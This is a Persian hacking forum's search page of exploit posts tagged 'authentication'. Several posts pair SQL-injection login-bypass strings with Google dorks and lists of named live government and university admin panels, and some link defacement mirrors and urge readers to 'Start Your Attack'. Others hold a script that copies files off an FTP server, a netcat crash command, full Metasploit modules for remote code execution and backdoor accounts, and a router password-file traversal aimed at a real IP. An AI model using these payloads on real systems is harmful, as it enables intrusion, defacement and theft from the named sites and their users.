امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'authentication'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

21 نتیجه پیدا شد

  1. |[+] Exploit Title: Designed & Developed by NIC,Bhubaneswar Authentication Bypass Vulnerability |[+] Date:18/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:https://odishavigilance.gov.in |[+] dork: intext:Designed & Developed by NIC,Bhubaneswar inurl:/login.aspx |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Rednofozi |[+] Vulnerability Type :Authentication Bypass Vulnerability |[+] Severity Level :Med. |[+] Exploit :info-------------->Authentication Bypass Vulnerability ***************************************************************| [+]Google Search intext:Designed & Developed by NIC,Bhubaneswar inurl:/login.aspx [+]The End , Enjoy Of Hacking ...! [+]|[+] Exploit Bypass : |[+] all sites user and pass |[+] Username: '=''or' |[+] Password: '=''or' [+] http://www.zone-h.org/mirror/id/31722197 ***************************************************************| |--------------------------------------------------------------| Authentication Bypass Vulnerability http://odishamsme.nic.in/contents/login.aspx https://www.sctevtservices.nic.in/PATHASALA/Login.aspx https://aiimsbhubaneswar.nic.in/admin/Login.aspx http://agrisnetodisha.ori.nic.in/Login.aspx https://ntse.scertodisha.nic.in/HHS/login.aspx https://ncert-cee.kar.nic.in/login.aspx https://od.dmdashboard.nic.in/Login.aspx https://odishavigilance.gov.in/vigilance/login.aspx **************************************************************** Discovered by : Rednofozi |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi.Inj3ct0r http://www.exploit4arab.org/exploits/2175
  2. [+] Exploit Title: Website Content Managed by Vigilance Directorate, Odisha Server login Authentication Bypass Vulnerability |[+] Date: 18/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: Windows 10 and kali |[+] Vendor Homepage :https://odishavigilance.gov.in |[+] ME:Inj3ctor@gmx.us |--------------------------------------------------------------| ################################################################ |[+] Exploit : |[+] all sites user and pass |[+] Username: '=''or' |[+] Password: '=''or' |[+] |[+] Admin Url :- |[+] |[+] |[+]https://odishavigilance.gov.in/Admin/Admin_Login.aspx Server login https://odishavigilance.gov.in/vigilance/login.aspx |--------------------------------------------------------------| **************************************************************** Discovered by : Rednofozi |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi. Inj3ct0r http://www.exploit4arab.org/exploits/2174
  3. |[+] Exploit Title: Indian Visa Application GOV.IN *.subdomains Authentication Bypass Vulnerability |[+] Date:16/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:https://indianvisaonline.gov.in |[+] dork: 'inurl admin login aspx site gov.in' |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Rednofozi Anonysec hackers iran team |[+] Vulnerability Type :Authentication Bypass Vulnerability |[+] Severity Level :Med. |[+] Exploit :info admin log -------------->/admin/login.aspx ***************************************************************| [+]Google Search 'inurl admin login aspx site gov.in' [+]You do not need to scroll to the admin panel. Scratch the panel [+]Authentication Bypass Vulnerability -------------->Username & Password Field with : ( '=''or' ) [+]Put Username & Password Field with : ( '=''or' ) .... now , Start Your Attack ;) [+]The End , Enjoy Of Hacking ...! [+] [+] http://www.zone-h.org/mirror/id/31722197 ***************************************************************| RHG Team hackers And test this password '=' 'or' 'or ' 'x'='x "or "x"="x or 0=0 # 'or 1=1-- |--------------------------------------------------------------| Authentication Bypass Vulnerability https://indianvisaonline.gov.in/admin/Login.jsp----------------->http://www.zone-h.org/mirror/id/31722197 https://pgsindia-ncof.gov.in/admin_login.aspx http://paradipport.gov.in/Admin/Login.aspx http://www.mahahp.gov.in/admin/adminlogin.aspx http://www.fci.gov.in/fci/ http://ncdmaindia.gov.in/AdminSection.aspx http://wccb.gov.in/AUTH/AdminPanel/Login.aspx http://cwprs.gov.in/Admin/Login.aspx https://indianvisaonline.gov.in/admin/Login.jsp About 26,500 results Enjoy Of Hacking ...! **************************************************************** Discovered by : Rednofozi |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi.Inj3ct0r http://www.exploit4arab.org/exploits/2154
  4. |[+] Exploit Title: Pakistan © Copyright by COMSATS IT Center edu.pk *.subdomains Authentication Bypass Vulnerability |[+] Date16/10/2018 |[+] Exploit Author : Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage:http://ww3.comsats.edu.pk/itcenter/ |[+] dork: intext:© Copyright by COMSATS IT Center |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RHG hackers iran team |[+] Credits : Rednofozi Anonysec hackers iran team |[+] Vulnerability Type :Authentication Bypass Vulnerability |[+] Severity Level :Med. |[+] Exploit :info admin log -------------->/admin/login.aspx ***************************************************************| [+]Google Search intext:© Copyright by COMSATS IT Center [+]Authentication Bypass Vulnerability -------------->Username & Password Field with : ( '=''or' ) [+]Put Username & Password Field with : ( '=''or' ) .... now , Start Your Attack ;) [+]The End , Enjoy Of Hacking ...! [+] [+] http://www.zone-h.org/mirror/id/31722197 ***************************************************************| RHG Team hackers And test this password '=' 'or' 'or ' 'x'='x "or "x"="x or 0=0 # 'or 1=1-- |--------------------------------------------------------------| Authentication Bypass Vulnerability http://www.ciit-atd.edu.pk/admin/login.aspx http://ww3.comsats.edu.pk http://ww3.comssswwwerfv.edu.pk/cps/ About 202 results for Attek **************************************************************** Discovered by : Rednofozi |RHG Team hackers Thanks To: ReZa CLONER , Moeein Seven. Rednofozi.Inj3ct0r http://www.exploit4arab.org/exploits/2153
  5. |[+] Exploit Title:All Rights Reserved © Universiti Sains Malaysia.2016-2018 Authentication Bypass Vulnerability |[+] Date:14/10/2018 |[+] Exploit Author :Rednofozi |[+] Tested on: : Windows 10 , parrot os |[+] Vendor Homepage: https://www.usm.my/index.php/en/ |[+] dork: inurl /admin/add_banner.php |[+] MY page https://cxsecurity.com/author/Inj3ct0r |[+] MY page http://www.exploit4arab.org/author/308/Rednofozi |[+] ME:Rednfozi@yahoo.com |[+] ME:Rednofozi@hotmail.com |[+] ME:inj3ct0r@tuta.io |[+] fb.me :https://www.facebook.com/saeid.hat.3 |--------------------------------------------------------------| |[+] RGH Digital Security Team |[+] Credits : Rednofozi |[+] Vulnerability Type : Authentication Bypass Vulnerability |[+] Exploit Risk : Medium |[+] dork: inurl /admin/add_banner.php ***************************************************************| https://www.christinamaryhendrietrust.com/admin/login-failed.php http://www.fm105.no/admin/index.php?grid_id=12&id=3&val=edt https://www.usm.my/index.php/en/admin-login Admin Username : '=''or' Admin Password : '=''or' |--------------------------------------------------------------| my name is Inj3ct0r Red Hat's hackers ********************************************************************** Discovered by : Rednofozi RGH Digital Security Team Thanks To: ReZa CLONER , Moeein Seven. Rednofozi http://www.exploit4arab.org/exploits/2145
  6. # Exploit Title : Design and Developed By UNASJEE Authentication Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Vendor Homepage : unasjee.net # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 - [ Authentication Bypass Issues ] # CXSecurity : cxsecurity.com/ascii/WLB-2018090208 # Cyberizm : cyberizm.org/cyberizm-design-by-unasjee-authentication-bypass-vuln.html ################################################################################################# # Google Dork : intext:''Designed & Developed by: UNASJEE'' intext:''Developed by: UNASJEE'' # Admin Control Panel Path : /admincp/index.php # Exploit : Admin Username : '=''or' Admin Password : '=''or' # Configuration File Directory Path : /admincp/config.inc # Useable Admin Control Panel URL Links => /admincp/mmainsections.php /admincp/edititem.php /admincp/allproducts2.php?sort=isNew /admincp/allproducts2.php?sort=isSug /admincp/allproducts.php?sort=order%20by%20ItmName /admincp/allproducts.php?sort=order%20by%20ArtNo /admincp/allproducts2.php?sort=soption /admincp/vinquiries.php /admincp/mnews.php /admincp/editemail2.php /admincp/newsletters.php /admincp/links.php /admincp/sendnewsletters.php /admincp/changepass.php /admincp/profile.php /admincp/contact2.php /admincp/f-view.php /admincp/ani.php # Directory File Paths => /admincp/sdata/itmimgs/.... /admincp/sdata/banner/.... /admincp/sdata/fviewimgs/... /admincp/sdata/itmimgs/... /admincp/sdata/mainimgs/... /admincp/sdata/mimgs/... /admincp/sdata/msecimgs/... /admincp/sdata/nextimgs/... /admincp/sdata/secbanner/... /admincp/sdata/secimgs/.. /admincp/sdata/subimgs/... ################################################################################################# # Example Vulnerable Sites => tbshandtools.com/admincp/index.php => [ Proof of Concept ] => archive.is/3fTzD chableather.com/admincp/index.php fadensports.com/admincp/config.inc ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  7. # Exploit Title : FlushDesign ZetaFactory Italy SQL Injection and Authentication Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/10/2018 # Vendor Homepage : flushdesign.it ~ zetafactory.com # Tested On : Windows and Linux # Category : WebApps # Google Dork : N/A # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # SQL Injection Exploit : /news/readnews.php?id=[SQL Injection] /productions/productionsview.php?id=[SQL Injection] /artists/bands_view.php?id=[SQL Injection] # Admin Login Bypass [ Authentication Bypass ] Exploit : Admin Panel Login Path : /admin/ Admin Username : '=''or' Admin Password : '=''or' # Useable Admin Control Panel URL Links => /admin/home.php /admin/banner.php /admin/banner/thumbs/..... /admin/bio.php /admin/news.php /admin/bands.php /admin/bands/thumbs/.... /admin/news.php /admin/works.php /admin/audio.php /admin/video.php /admin/download.php /admin/links.php /admin/contacts.php /admin/photos.php ################################################################################################# # Example Vulnerable Site => dysfunctionproductions.com => [ Proof of Concept ] => archive.is/J86XL # SQL Database Error => Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /web/htdocs/www.dysfunctionproductions.com/home/news/readnews.php on line 40 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  8. ################################################################################################# # Exploit Title : Designed & Hosted By MWC Design England Authentication Bypass Vulnerability # Author [ Discovered By ] : AYAR from Cyberizm Digital Security Army # Date : 28/09/2018 # Vendor Homepage : mwcdesign.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] ################################################################################################# # Google Dork : intext:''Designe & Hosted By. MWC'' intext:''Designed & Hosted By. MWC'' intext:''Design By: MWC'' # Admin Page Login Path => /admincp/ # Exploit : Admin Username : anything' OR 'x'='x Admin Password : anything' OR 'x'='x # Useable Admin Control Panel URL Links => /admincp/mmainsections.php /admincp/clints.php /admincp/vinquiries.php /admincp/mnews.php /admincp/settings.php /admincp/changepass.php ################################################################################################# # Example Vulnerable Site => losotecintl.com/admincp/
  9. ################################################################################################# # Exploit Title : Azeemi-Tech Technology Company A2zcreatorz Authentication Admin Login Bypass Vulnerability # Author [ Discovered By ] : AYAR from Cyberizm Digital Security Army # Date : 28/09/2018 # Vendor Homepage : a2zcreatorz.com ~ azeemi-tech.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] ################################################################################################# # Google Dork : intext:''Designed & Developed by: Azeemi'' # Admin Panel Path => /admincp/ # Exploit : Admin Username : anything' OR 'x'='x Admin Password : anything' OR 'x'='x # Useable Admin Control Panel URL Links => /admincp/mmainsections.php /admincp/vinquiries.php /admincp/mnews.php /admincp/newsletters.php /admincp/sendnewsletters.php /admincp/changepass.php /admincp/profile.php /admincp/contact2.php /admincp/f-view.php ################################################################################################# # Example Vulnerable Site => mamaxent.com/admincp/index.php ################################################################################################# # Discovered By AYAR from Cyberizm.Org Digital Security Team ################################################################################################# # Thanks to Cyberizm Team => KingSkrupellos ~ H4CK4L ~ The_ZiziL ~ 1hT1y@R DARKDAYS ~ Leader Shawai ~ OrJiNaL ~ Stallk3r ~ Meczup ~ Dessy and other precious members. #################################################################################################
  10. ################################################################################################# # Exploit Title : Developed By PC TECH 1996 - 2014 Pakistan Hosting Authentication Bypass Vulnerability # Author [ Discovered By ] : AYAR from Cyberizm Digital Security Army # Date : 28/09/2018 # Vendor Homepage : pctech.net.pk # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 [ Authentication Bypass Issues ] ################################################################################################# # Google Dork : intext:''Developed By: PC TECH'' intext:''All Rights Reserved by PC TECH 1996 - 2014. Developed by PC TECH'' # Exploit : Admin Username : anything' OR 'x'='x Admin Password : anything' OR 'x'='x # Useable Admin Control Panel URL Links => /admincp/main.asp /admincp/manageProducts.asp /admincp/manageSize.asp /admincp/manageColors.asp /admincp/vinq.asp /admincp/mnews.asp /admincp/changePASS.asp ################################################################################################# # Example Vulnerable Site => pomee.com/admincp/ ################################################################################################# # Discovered By AYAR from Cyberizm.Org Digital Security Team ################################################################################################# # Thanks to Cyberizm Team => KingSkrupellos ~ H4CK4L ~ The_ZiziL ~ 1hT1y@R DARKDAYS ~ Leader Shawai ~ OrJiNaL ~ Stallk3r ~ Meczup ~ Dessy and other precious members. #################################################################################################
  11. # # # # # # Exploit Title: Bitcoin,Dogecoin Mining 1.0 - Authentication Bypass # Dork: N/A # Date: 21.08.2017 # Vendor Homepage: https://codecanyon.net/user/bousague # Software Link: https://codecanyon.net/item/bitcoindogecoin-mining-php-script/20315581 # Demo: http://test.z-files.site/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to access the user panel and administration panel ... # # Proof of Concept: # # http://localhost/[PATH]/ # http://localhost/[PATH]/admincqqq # User: anything Pass: 'or 1=1 or ''=' # # Etc... # # # # #
  12. ################################################################################################# # Exploit Title : BulkSMSSystem Bangladesh Education Improper Authentication Backdoor Account Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 04/09/2018 # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-287 - [ Improper Authentication ] + CWE-434 [ Unrestricted Upload of File with Dangerous Type ] + CWE-288 - [ Authentication Bypass Using an Alternate Path or Channel ] ################################################################################################# # Description for Improper Authentication Vulnerability [ CWE-287 ] + When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct. + If software incorrectly validates user logon information or allows using different techniques of malicious credentials gathering (e.g. brute force, spoofing or change the URL links without giving a username and pass), an attacker can gain certain privileges within the application or disclose sensitive information. + If the parameter is equal to "user" the application allows viewing the information, if it is equal to "admin", then it is possible to edit information on the page: + If an attacker changes the value of the "group" parameter to "admin", he will be able to modify the page. + The attacker might be able to gain unauthorized access to the application and otherwise restricted areas and perform certain actions, e.g. disclose sensitive information, alter application, or even execute arbitrary code. + An attacker can use a variety of vectors to exploit this weakness, including brute-force, session fixation, and Man-in-the-Middle (MitM) attacks. Reference [ Short Explained by me ] => CWE-287: Improper Authentication [cwe.mitre.org] ######################################################################################### # Google Dork : inurl:/admin/myfile/index.php site:bd # Exploit : /admin/myfile/index.php No Username and Password Required. # Useable Admin Control Panel Path URL Links => /admin/index.php /admin/myfile/index.php /admin/member.php /admin/member2.php /admin/headline.php See your uploaded backdoor .php file here => /pdfview.php?id=[ID-NUMBER] ################################################################################################# # Example Site => pbmhhschandpur.edu.bd => [ Proof of Concept ] => archive.is/m9D3m ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  13. #!/usr/bin/env python #================================================================================== # Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service # Date: 2015-05-25 # Exploit Author: Wh1t3Rh1n0 (Michael Allen) # Exploit Author's Homepage: http://www.mikeallen.org # Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302 # Version: 3.0 # Tested on: iPhone #================================================================================== # ------------------ # Denial of Service: # ------------------ # The FTP server does not properly handle errors raised by invalid # FTP commands. The following command, which sends an invalid PORT command to # the FTP server, will crash the server once it is received. # echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000 # ---------------------- # Authentication Bypass: # ---------------------- # The FTP server does not handle unauthenticated connections or incorrect login # credentials properly. A remote user can issue commands to the FTP server # without authenticating or after entering incorrect credentials. # The following proof-of-concept connects to the given FTP server and # downloads all files stored in the "Camera Roll" folder without providing a # username or password: import sys from ftplib import FTP if len(sys.argv) <= 1: print "Usage: ./ftp-nologin.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) files = [] def append_file(s): files.append(s.split(' ')[-1]) blocks = [] def get_blocks(d): blocks.append(d) ftp = FTP() print ftp.connect(host, port) ftp.set_pasv(1) ftp.cwd("Camera Roll") print ftp.retrlines('LIST', append_file) files.pop(0) for filename in files: print "Downloading %s..." % filename ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks) f = open(filename, 'wb') for block in blocks: f.write(block) f.close() print "[+] File saved to: %s" % filename blocks = [] ftp.quit()
  14. ############################################ # Title : ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass # Author :Rednofozi # category : webapps # Tested On : Kali Linux # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Vendor HomePage :https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/ # Google Dork: inurl:N/A # Sofrware version: 1.1.2.2_17 ############################################ # search google Dork : N/A ####################Proof of Concept ############# # 1. Description: # In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization # parameter in post data, that use for authorization access to admin panel, # the data of this parameter is not fully random and you can use old data # or data of another device to access admin panel. # 2. Proof of Concept: # Browse http://<Your Modem IP>/login.cgi # Send this post data: group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D # Or this post data: group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D ###################### # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1988
  15. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution', 'Description' => %q{ This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities include an authentication bypass, a directory traversal and a privilege escalation to get privileged code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Wulftange', #discovery 'bperry' # metasploit module ], 'References' => [ ['CVE', '2015-1486'], ['CVE', '2015-1487'], ['CVE', '2015-1489'], ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html'] ], 'DefaultOptions' => { 'SSL' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { 'Arch' => ARCH_X86, 'Payload' => { 'DisableNops' => true } } ], ], 'Privileged' => true, 'DisclosureDate' => 'Jul 31 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8443), OptString.new('TARGETURI', [true, 'The path of the web application', '/']), ], self.class) end def exploit meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) print_status("#{peer} - Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_post' => { 'ActionType' => 'ResetPassword', 'UserID' => 'admin', 'Domain' => '' } }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way") end cookie = res.get_cookies if cookie.nil? || cookie.empty? fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie") end exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%> <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe", 'KnownHosts' => '.' }, 'data' => payload.encoded_exe, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") print_status("#{peer} - Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', 'vars_get' => { 'ActionType' => 'BinaryFile', 'Action' => 'UploadPackage', 'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp", 'KnownHosts' => '.' }, 'data' => exec, 'cookie' => cookie, 'ctype' => '' }) unless res && res.code == 200 fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way") end register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") print_status("#{peer} - Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) end end
  16. mohammad_ghazei

    Hacking

    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # <!-- # Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: N/A # Date: 27.08.2017 # Vendor Homepage: http://www.scubez.net/ # Software Link: http://www.mscript.in/ # Version: 2.7 # Category: Webapps # Tested on: windows 7 / mozila firefox # supporting tools for testing : No-Redirect Add-on in firefox # --!> # ======================================================== # # # admin panel Authentication bypass # # Description : An Attackers are able to completely compromise the web application built upon # Matrimonial Script as they can gain access to the admin panel and manage the website as an admin without # prior authentication! # # Proof of Concept : - # Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php # Step 2: Access http://example.com/path/admin/index.php # # # Risk : Unauthenticated attackers are able to gain full access to the administrator panel # and thus have total control over the web application, including content change,add admin user .. etc # # # # # ======================================================== # [+] Disclaimer # # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and that due # credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit is given to # the author. The author is not responsible for any misuse of the information contained # herein and prohibits any malicious use of all security related information # or exploits by the author or elsewhere. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
  17. Anonyali

    Hacking

    # Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack) # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943 # Date: 29-08-2017 # Exploit Author: Jithin D Kurup # Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142 # Vendor : www.dlink.com # Version: Hardware version: B1 Firmware version: 2.01 # Tested on:All Platforms 1) Description After Successfully Connected to D-Link DIR-600 Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's Admin Panel Just by adding a simple payload into URL. D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password. Its More Dangerous when your Router has a public IP with remote login enabled. IN MY CASE, Tested Router IP : http://190.164.170.249 Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ 2) Proof of Concept Step 1: Go to Router Login Page : http://190.164.170.249:8080 Step 2: Add the payload to URL. Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd Bingooo You got admin Access on router. Now you can download/upload settiing, Change setting etc. ---------------Greetz---------------- +++++++++++ www.0seccon.com ++++++++++++ Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith
  18. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Remote::SSH def initialize(info={}) super(update_info(info, 'Name' => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Cisco Firepower Management Console. The management system contains a configuration flaw that allows the www user to execute the useradd binary, which can be abused to create backdoor accounts. Authentication is required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt', # Original discovery & PoC 'sinn3r' # Metasploit module ], 'References' => [ [ 'CVE', '2016-6433' ], [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ] ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Oct 10 2016', 'CmdStagerFlavor'=> %w{ echo }, 'DefaultOptions' => { 'SSL' => 'true', 'SSLVersion' => 'Auto', 'RPORT' => 443 }, 'DefaultTarget' => 0)) register_options( [ # admin:Admin123 is the default credential for 6.0.1 OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']), OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']), OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']), OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']), OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']), OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22]) ], self.class) end def check # For this exploit to work, we need to check two services: # * HTTP - To create the backdoor account for SSH # * SSH - To execute our payload vprint_status('Checking Cisco Firepower Management console...') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213') }) if res && res.code == 200 vprint_status("Console is found.") vprint_status("Checking SSH service.") begin ::Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(rhost, 'admin', port: datastore['SSHPORT'], password: Rex::Text.rand_text_alpha(5), auth_methods: ['password'], non_interactive: true ) end rescue Timeout::Error vprint_error('The SSH connection timed out.') return Exploit::CheckCode::Unknown rescue Net::SSH::AuthenticationFailed # Hey, it talked. So that means SSH is running. return Exploit::CheckCode::Appears rescue Net::SSH::Exception => e vprint_error(e.message) end end Exploit::CheckCode::Safe end def get_sf_action_id(sid) requirements = {} print_status('Attempting to obtain sf_action_id from rulesimport.cgi') uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'cookie' => "CGISESSID=#{sid}" }) unless res fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.') end sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1] unless 